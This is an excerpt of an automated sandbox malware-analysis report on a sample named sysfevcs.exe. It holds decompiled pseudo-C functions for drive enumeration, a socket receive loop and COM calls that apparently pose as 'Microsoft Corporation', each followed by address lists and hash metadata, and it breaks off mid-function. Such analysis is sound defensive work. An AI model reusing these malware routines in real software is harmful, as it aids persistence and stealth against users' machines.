                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                                                                                  • String ID: C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                  • API String ID: 459949847-2019468496
                                                                                                                                                                                                                                                                  • Opcode ID: 5975e5186cd30a6029e80f17e080887203ca676b882e7fd9846ae620acde5260
                                                                                                                                                                                                                                                                  • Instruction ID: 0d179a223d5d04d98ee6b13ff580c22635ce0ab0454649889296378f6cfd7aab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5975e5186cd30a6029e80f17e080887203ca676b882e7fd9846ae620acde5260
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E09AB8900208EBC724EBA0EE0EB8E7728EB04712F1004B8F50566290DA766E48CB19
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404900(WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				short _v1052;
                                                                                                                                                                                                                                                                  				intOrPtr _v1056;
                                                                                                                                                                                                                                                                  				int _t18;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetDriveTypeW(_a4);
                                                                                                                                                                                                                                                                  				_v1056 = _v8;
                                                                                                                                                                                                                                                                  				if(_v1056 >= 2 && (_v1056 <= 3 || _v1056 == 6)) {
                                                                                                                                                                                                                                                                  					if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0) {
                                                                                                                                                                                                                                                                  						_t18 = StrCmpNW( &_v1052, L"\\??\\", 4); // executed
                                                                                                                                                                                                                                                                  						if(_t18 == 0) {
                                                                                                                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}







                                                                                                                                                                                                                                                                  0x00404913
                                                                                                                                                                                                                                                                  0x00404919
                                                                                                                                                                                                                                                                  0x00404926
                                                                                                                                                                                                                                                                  0x00404954
                                                                                                                                                                                                                                                                  0x00404964
                                                                                                                                                                                                                                                                  0x0040496c
                                                                                                                                                                                                                                                                  0x0040496e
                                                                                                                                                                                                                                                                  0x0040496e
                                                                                                                                                                                                                                                                  0x0040496c
                                                                                                                                                                                                                                                                  0x00404954
                                                                                                                                                                                                                                                                  0x0040497b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(004049BF), ref: 0040490D
                                                                                                                                                                                                                                                                  • QueryDosDeviceW.KERNEL32(004049BF,?,00000208), ref: 0040494C
                                                                                                                                                                                                                                                                  • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 00404964
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                                  • String ID: \??\
                                                                                                                                                                                                                                                                  • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                                  • Opcode ID: 942f71382a869f2c97a40c4b9f3276f149eb08a5c33dbbf2d140b6582a894b9a
                                                                                                                                                                                                                                                                  • Instruction ID: 0e74c5151ddb8513688fdff2756bd8c47834fad0a87df30cb323bbc8f0aad129
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 942f71382a869f2c97a40c4b9f3276f149eb08a5c33dbbf2d140b6582a894b9a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4001E1F094120CEBCB60CF65CD49ADA77B4AB45705F0081BAA604B7690D7749E85CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                                                                                                                  			E0040D7F0(char* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				char _v32;
                                                                                                                                                                                                                                                                  				char _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                                                                                                                  				char _v56;
                                                                                                                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                                                                                                                  				char* _t23;
                                                                                                                                                                                                                                                                  				short _t26;
                                                                                                                                                                                                                                                                  				long _t29;
                                                                                                                                                                                                                                                                  				short _t34;
                                                                                                                                                                                                                                                                  				intOrPtr _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                                                                                                                  				long _t47;
                                                                                                                                                                                                                                                                  				signed int _t48;
                                                                                                                                                                                                                                                                  				void* _t50;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t40 = __edx;
                                                                                                                                                                                                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                                                                                                                                                                                                  				_t34 = 0;
                                                                                                                                                                                                                                                                  				_t43 = _a4;
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_t23 =  &_v32;
                                                                                                                                                                                                                                                                  					_v32 = 0;
                                                                                                                                                                                                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23); // executed
                                                                                                                                                                                                                                                                  					if(_t23 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t37 = _v44;
                                                                                                                                                                                                                                                                  					if(_t37 != 0) {
                                                                                                                                                                                                                                                                  						if(_t34 == 0 || _v40 < _t37) {
                                                                                                                                                                                                                                                                  							_v40 = _t37;
                                                                                                                                                                                                                                                                  							_t26 = E00408880(_t37, _t40, _t34, _t37);
                                                                                                                                                                                                                                                                  							_t37 = _v44;
                                                                                                                                                                                                                                                                  							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                                  							_t34 = _t26;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v26 = 0;
                                                                                                                                                                                                                                                                  						_v22 = 0;
                                                                                                                                                                                                                                                                  						_v18 = 0;
                                                                                                                                                                                                                                                                  						_t29 =  *(_t43 + 8);
                                                                                                                                                                                                                                                                  						_v32 = 0;
                                                                                                                                                                                                                                                                  						_t40 =  &_v32;
                                                                                                                                                                                                                                                                  						_v36 = 0x10;
                                                                                                                                                                                                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36); // executed
                                                                                                                                                                                                                                                                  						_t47 = _t29;
                                                                                                                                                                                                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                                                                                                                                                                                                  							_t40 =  &_v56;
                                                                                                                                                                                                                                                                  							E0040D6C0(_t43, _t34, _t47, _v68,  &_v56);
                                                                                                                                                                                                                                                                  							_t50 = _t50 + 0x14;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                                                                                                                                                                                                  				return E00408990(_t34);
                                                                                                                                                                                                                                                                  			}























                                                                                                                                                                                                                                                                  0x0040d7f0
                                                                                                                                                                                                                                                                  0x0040d7f6
                                                                                                                                                                                                                                                                  0x0040d7fb
                                                                                                                                                                                                                                                                  0x0040d7fe
                                                                                                                                                                                                                                                                  0x0040d801
                                                                                                                                                                                                                                                                  0x0040d805
                                                                                                                                                                                                                                                                  0x0040d808
                                                                                                                                                                                                                                                                  0x0040d813
                                                                                                                                                                                                                                                                  0x0040d81b
                                                                                                                                                                                                                                                                  0x0040d824
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d82a
                                                                                                                                                                                                                                                                  0x0040d830
                                                                                                                                                                                                                                                                  0x0040d838
                                                                                                                                                                                                                                                                  0x0040d842
                                                                                                                                                                                                                                                                  0x0040d846
                                                                                                                                                                                                                                                                  0x0040d84b
                                                                                                                                                                                                                                                                  0x0040d84f
                                                                                                                                                                                                                                                                  0x0040d852
                                                                                                                                                                                                                                                                  0x0040d852
                                                                                                                                                                                                                                                                  0x0040d858
                                                                                                                                                                                                                                                                  0x0040d85c
                                                                                                                                                                                                                                                                  0x0040d860
                                                                                                                                                                                                                                                                  0x0040d864
                                                                                                                                                                                                                                                                  0x0040d86e
                                                                                                                                                                                                                                                                  0x0040d871
                                                                                                                                                                                                                                                                  0x0040d876
                                                                                                                                                                                                                                                                  0x0040d880
                                                                                                                                                                                                                                                                  0x0040d888
                                                                                                                                                                                                                                                                  0x0040d88e
                                                                                                                                                                                                                                                                  0x0040d893
                                                                                                                                                                                                                                                                  0x0040d89e
                                                                                                                                                                                                                                                                  0x0040d8a8
                                                                                                                                                                                                                                                                  0x0040d8b1
                                                                                                                                                                                                                                                                  0x0040d8b6
                                                                                                                                                                                                                                                                  0x0040d8b6
                                                                                                                                                                                                                                                                  0x0040d893
                                                                                                                                                                                                                                                                  0x0040d8c5
                                                                                                                                                                                                                                                                  0x0040d8df

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32 ref: 0040D81B
                                                                                                                                                                                                                                                                  • recvfrom.WS2_32 ref: 0040D888
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D89E
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040D8BF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3980219359-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6b87af7eed4ef285fb057bd2bc99b548a248679a98a93126801c8ab8a9711c94
                                                                                                                                                                                                                                                                  • Instruction ID: 119aadf5a9a9cd361830cf8028f649034fe7dd0606bb4db59d8f1df16a6ab9b6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b87af7eed4ef285fb057bd2bc99b548a248679a98a93126801c8ab8a9711c94
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 672187B2504301AFD314EF65DC8496BB7E9EF84314F008A3DF565E2291E774D94C8BAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                                                                                                                  			E00405640(intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                                                                                                                                  				void* _v32;
                                                                                                                                                                                                                                                                  				short _v36;
                                                                                                                                                                                                                                                                  				char _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _t95;
                                                                                                                                                                                                                                                                  				void* _t101;
                                                                                                                                                                                                                                                                  				void* _t103;
                                                                                                                                                                                                                                                                  				intOrPtr _t110;
                                                                                                                                                                                                                                                                  				void* _t118;
                                                                                                                                                                                                                                                                  				void* _t122;
                                                                                                                                                                                                                                                                  				void* _t199;
                                                                                                                                                                                                                                                                  				void* _t200;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_t95 = E004055F0(0x410f58, 0x410f68); // executed
                                                                                                                                                                                                                                                                  					_t200 = _t199 + 8;
                                                                                                                                                                                                                                                                  					_v28 = _t95;
                                                                                                                                                                                                                                                                  					if(_v28 == 0) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_push( &_v32);
                                                                                                                                                                                                                                                                  					_push(_v28);
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                  						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))(_v32,  &_v16); // executed
                                                                                                                                                                                                                                                                  						if(_t101 == 0) {
                                                                                                                                                                                                                                                                  							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))(_v16,  &_v36); // executed
                                                                                                                                                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                                                                                                                                                  								if(_v36 == 0xffffffff) {
                                                                                                                                                                                                                                                                  									_push( &_v12);
                                                                                                                                                                                                                                                                  									_push(_v16);
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                                                                                                                                                                                                  										_push( &_v24);
                                                                                                                                                                                                                                                                  										_push(_a4);
                                                                                                                                                                                                                                                                  										_push(_v12);
                                                                                                                                                                                                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                                                                                                                                                                                                  											_t110 = E004055F0(0x410f78, 0x410f88);
                                                                                                                                                                                                                                                                  											_t199 = _t200 + 8;
                                                                                                                                                                                                                                                                  											_v24 = _t110;
                                                                                                                                                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                                                                                                                                                  												__imp__#2(L"Microsoft Corporation");
                                                                                                                                                                                                                                                                  												_v8 = _t110;
                                                                                                                                                                                                                                                                  												if(_v8 != 0) {
                                                                                                                                                                                                                                                                  													_push(_v8);
                                                                                                                                                                                                                                                                  													_push(_v24);
                                                                                                                                                                                                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                  														_push(_a4);
                                                                                                                                                                                                                                                                  														_push(_v24);
                                                                                                                                                                                                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                                                                                                                                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  															if(_t118 == 0) {
                                                                                                                                                                                                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                                                                                                                                                                                                  																_t118 = 0;
                                                                                                                                                                                                                                                                  																if(0 != 0) {
                                                                                                                                                                                                                                                                  																	continue;
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																L34:
                                                                                                                                                                                                                                                                  																if(_v20 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 = E00408990(_v20);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v8 != 0) {
                                                                                                                                                                                                                                                                  																	__imp__#6(_v8);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v24 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v12 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v16 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v32 != 0) {
                                                                                                                                                                                                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  																if(_v28 == 0) {
                                                                                                                                                                                                                                                                  																	return _t118;
                                                                                                                                                                                                                                                                  																} else {
                                                                                                                                                                                                                                                                  																	_t122 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28); // executed
                                                                                                                                                                                                                                                                  																	return _t122;
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  															goto L34;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  														goto L34;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  													goto L34;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  												goto L34;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											goto L34;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                                                                                                                                                                                                  										if(_t118 == 0) {
                                                                                                                                                                                                                                                                  											if(_v36 != 0xffffffff) {
                                                                                                                                                                                                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                                                                                                                                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												_v40 = 0;
                                                                                                                                                                                                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                                                                                                                                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                                                                                                                                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L34;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L34;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L34;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L34;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L34;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L34;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x00405646
                                                                                                                                                                                                                                                                  0x0040564d
                                                                                                                                                                                                                                                                  0x00405654
                                                                                                                                                                                                                                                                  0x0040565b
                                                                                                                                                                                                                                                                  0x00405662
                                                                                                                                                                                                                                                                  0x00405669
                                                                                                                                                                                                                                                                  0x00405670
                                                                                                                                                                                                                                                                  0x00405677
                                                                                                                                                                                                                                                                  0x00405681
                                                                                                                                                                                                                                                                  0x00405686
                                                                                                                                                                                                                                                                  0x00405689
                                                                                                                                                                                                                                                                  0x00405690
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040569a
                                                                                                                                                                                                                                                                  0x004056a3
                                                                                                                                                                                                                                                                  0x004056ab
                                                                                                                                                                                                                                                                  0x004056c2
                                                                                                                                                                                                                                                                  0x004056c6
                                                                                                                                                                                                                                                                  0x004056dd
                                                                                                                                                                                                                                                                  0x004056e1
                                                                                                                                                                                                                                                                  0x004056ef
                                                                                                                                                                                                                                                                  0x004056f9
                                                                                                                                                                                                                                                                  0x00405702
                                                                                                                                                                                                                                                                  0x0040570a
                                                                                                                                                                                                                                                                  0x00405714
                                                                                                                                                                                                                                                                  0x00405718
                                                                                                                                                                                                                                                                  0x00405721
                                                                                                                                                                                                                                                                  0x00405729
                                                                                                                                                                                                                                                                  0x004057b3
                                                                                                                                                                                                                                                                  0x004057b8
                                                                                                                                                                                                                                                                  0x004057bb
                                                                                                                                                                                                                                                                  0x004057c2
                                                                                                                                                                                                                                                                  0x004057cb
                                                                                                                                                                                                                                                                  0x004057d1
                                                                                                                                                                                                                                                                  0x004057d8
                                                                                                                                                                                                                                                                  0x004057df
                                                                                                                                                                                                                                                                  0x004057e8
                                                                                                                                                                                                                                                                  0x004057f0
                                                                                                                                                                                                                                                                  0x004057f7
                                                                                                                                                                                                                                                                  0x00405800
                                                                                                                                                                                                                                                                  0x00405808
                                                                                                                                                                                                                                                                  0x0040581a
                                                                                                                                                                                                                                                                  0x0040581e
                                                                                                                                                                                                                                                                  0x00405832
                                                                                                                                                                                                                                                                  0x00405834
                                                                                                                                                                                                                                                                  0x00405836
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040583c
                                                                                                                                                                                                                                                                  0x00405840
                                                                                                                                                                                                                                                                  0x00405846
                                                                                                                                                                                                                                                                  0x0040584b
                                                                                                                                                                                                                                                                  0x00405852
                                                                                                                                                                                                                                                                  0x00405858
                                                                                                                                                                                                                                                                  0x00405858
                                                                                                                                                                                                                                                                  0x00405862
                                                                                                                                                                                                                                                                  0x00405870
                                                                                                                                                                                                                                                                  0x00405870
                                                                                                                                                                                                                                                                  0x00405876
                                                                                                                                                                                                                                                                  0x00405884
                                                                                                                                                                                                                                                                  0x00405884
                                                                                                                                                                                                                                                                  0x0040588a
                                                                                                                                                                                                                                                                  0x00405898
                                                                                                                                                                                                                                                                  0x00405898
                                                                                                                                                                                                                                                                  0x0040589e
                                                                                                                                                                                                                                                                  0x004058ac
                                                                                                                                                                                                                                                                  0x004058ac
                                                                                                                                                                                                                                                                  0x004058b2
                                                                                                                                                                                                                                                                  0x004058c5
                                                                                                                                                                                                                                                                  0x004058b4
                                                                                                                                                                                                                                                                  0x004058c0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004058c0
                                                                                                                                                                                                                                                                  0x004058b2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405820
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040580a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057f2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057da
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004057c4
                                                                                                                                                                                                                                                                  0x0040573b
                                                                                                                                                                                                                                                                  0x0040573f
                                                                                                                                                                                                                                                                  0x0040574d
                                                                                                                                                                                                                                                                  0x00405792
                                                                                                                                                                                                                                                                  0x004057a2
                                                                                                                                                                                                                                                                  0x0040574f
                                                                                                                                                                                                                                                                  0x0040574f
                                                                                                                                                                                                                                                                  0x00405766
                                                                                                                                                                                                                                                                  0x0040576a
                                                                                                                                                                                                                                                                  0x00405780
                                                                                                                                                                                                                                                                  0x00405780
                                                                                                                                                                                                                                                                  0x00405782
                                                                                                                                                                                                                                                                  0x004057a4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040573f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040570c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056f1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056e3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056c8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004056ad
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004055F0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00405610
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405858
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                                  • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                                  • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                                  • Opcode ID: aa4f9b29db513d638178775d5a230757786cb9c6d680b7eba4b3c3f3f36d9200
                                                                                                                                                                                                                                                                  • Instruction ID: 63bbab498f99db53ba01a8136a03793a8b602ba9dec1d09a194da87260503e76
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa4f9b29db513d638178775d5a230757786cb9c6d680b7eba4b3c3f3f36d9200
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4391FB75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E515B73A0D739AE42CF65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040CD40() {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				char _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                                                                                                                                  				intOrPtr _t31;
                                                                                                                                                                                                                                                                  				void* _t36;
                                                                                                                                                                                                                                                                  				void* _t37;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				__imp__CoInitializeEx(0, 2); // executed
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_t20 = E0040C2A0( &_v12,  &_v12); // executed
                                                                                                                                                                                                                                                                  				_t37 = _t36 + 4;
                                                                                                                                                                                                                                                                  				_v8 = _t20;
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                                                                                                                  					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                  						_t20 = E0040C950( *((intOrPtr*)(_v12 + _v16 * 4)));
